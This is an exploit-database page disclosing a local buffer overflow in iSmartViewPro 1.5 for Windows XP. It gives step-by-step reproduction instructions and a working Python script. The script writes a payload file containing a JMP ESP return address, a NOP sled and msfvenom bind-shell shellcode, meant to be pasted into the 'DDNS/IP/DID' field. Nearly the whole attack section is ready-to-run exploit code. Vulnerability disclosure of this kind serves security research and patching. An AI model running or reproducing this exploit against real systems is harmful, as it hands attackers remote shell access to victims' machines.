iSmartViewPro 1.5 'DDNS/IP/DID' Buffer Overflow

2018.09.04
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow # Discovery by: Luis Martinez # Discovery Date: 2018-09-03 # Vendor Homepage: https://securimport.com/ # Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 # Tested Version: 1.5 # Vulnerability Type: Buffer Overflow # Tested on OS: Windows XP Professional SP3 x86 es # Steps to Produce the Buffer Overflow: # 1.- Run python code : iSmartViewPro_1.5.py # 2.- Open iSmartViewPro_1.5.txt and copy content to clipboard # 3.- Open iSmartViewPro # 4.- Add Device # 5.- Add device manually # 6.- Device alias -> test # 7.- Paste ClipBoard on "DDNS/IP/DID" # 8.- Account -> admin # 9.- Password -> admin # 10.- Save #!/usr/bin/env python #7E6B30D7 FFE4 JMP ESP SHELL32.dll ret = "\xD7\x30\x6B\x7E" #msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c shellcode = ( "\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" "\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1" "\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c" "\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59" "\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14" "\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93" "\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1" "\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8" "\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf" "\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25" "\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d" "\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73" "\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74" "\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2" "\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1" "\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6" "\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e" "\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff" "\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc" "\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19" "\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74" "\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b" "\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11" "\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39") buffer = "\x41" * 383 + ret + "\x90" * 8 + shellcode f = open ("iSmartViewPro_1.5.txt", "w") f.write(buffer) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top